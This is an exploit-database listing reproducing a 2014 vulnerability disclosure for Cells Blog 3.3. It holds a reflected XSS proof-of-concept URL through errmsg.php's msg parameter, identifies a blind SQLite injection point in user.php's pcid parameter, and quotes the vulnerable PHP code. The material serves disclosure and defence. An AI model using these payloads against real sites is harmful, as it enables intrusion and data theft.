header-logo
Suggest Exploit
vendor:
Cells Blog
by:
vinicius777
8,8
CVSS
HIGH
Cross-site Scripting (XSS) & SQL Injection
79 (XSS) & 89 (SQL Injection)
CWE
Product Name: Cells Blog
Affected Version From: 3.3
Affected Version To: 3.3
Patch Exists: NO
Related CWE: N/A
CPE: a:cells:cells_blog:3.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

Cells v3.3 XSS Reflected & Blind SQLite Injection

Cells Blog 3.3 is vulnerable to Cross-site Scripting (XSS) and Blind SQLite Injection. The XSS vulnerability exists in the 'msg' parameter of the 'errmsg.php' script, while the Blind SQLite Injection vulnerability exists in the 'pcid' parameter of the 'user.php' script.

Mitigation:

Input validation and sanitization should be implemented to prevent XSS and SQL Injection attacks.
Source

Exploit-DB raw data:

################################################################
[+] Exploit: Cells v3.3 XSS Reflected & Blind SQLite Injection #
[+] Author: vinicius777					       #
[+] Contact: vinicius777 [AT] gmail @vinicius777_              #	
[+] version: Cells Blog 3.3				       #
[+] Vendor Homepage: http://cells.tw	                       #
################################################################

 
[+] 14/01/2014 vendor contacted
[+] 17/01/2014 no response from vendor
[+] 20/01/2014 no response from vendor
[+] 21/01/2014 Published  
 

 
[1] Reflective XSS on 'msg='

PoC: 
http://localhost/cells-v3-3/errmsg.php?msg= [%3C%2Fp%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%3Cp%3E]


Vulnerable Code:
[+] errmsg.php

<?
                echo "<img src='images/error.gif'>";
                if (isset($_GET["msg"])){$msg=$_GET["msg"];}else{$msg="";}
                if ($msg!=""){
                    echo "<br><br><br>".$msg;
                }else{
                        echo "<br><br><br>You may key in something wrong.<br>Please try it again! ..... ";
                        echo " If you always got this message, <br>please send a <a href='pub_pubmsg.php?bgid=1'>".$face_report."</a>";
                        echo " to the web master.";
                }
                ?> 

 
[2] Blind SQLite Injection on 'pcid'

PoC:
http://localhost/cells-v3-3/user.php?pcid= [SQLite Injection]

Vulnerable Code:
[+] user.php

if($_GET["pcid"]!=""){
$sql="select * from users where cdt='n' and pcid=".$_GET["pcid"];


#
#
# Greetz to g0tm1lk and TheColonial.

Navigation

Suggest Exploit

Services By CQR